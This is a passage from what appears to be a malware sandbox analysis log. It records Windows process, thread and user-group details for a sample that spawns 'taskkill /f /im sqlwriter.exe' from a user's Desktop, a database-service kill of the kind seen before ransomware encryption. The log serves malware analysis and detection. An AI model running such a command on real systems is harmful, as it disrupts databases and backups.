AUTHORITY\\Logon Session 00000000:000103c1" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 69 os_tid = 0x3fc Thread: id = 72 os_tid = 0xce0 Process: id = "20" image_name = "taskkill.exe" filename = "c:\\windows\\syswow64\\taskkill.exe" page_root = "0x50cf5000" os_pid = "0xf58" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "17" os_parent_pid = "0xb84" cmd_line = "taskkill.exe taskkill /f /im sqlwriter.exe" cur_dir = "C:\\Users\\FD1HVy\\Desktop\\" os_username = "NQDPDE\\FD1HVy" bitness = "32" os_groups = "NQDPDE\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:000103c1" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 74 os_tid = 0xe38 Thread: id = 75 os_tid = 0xfc4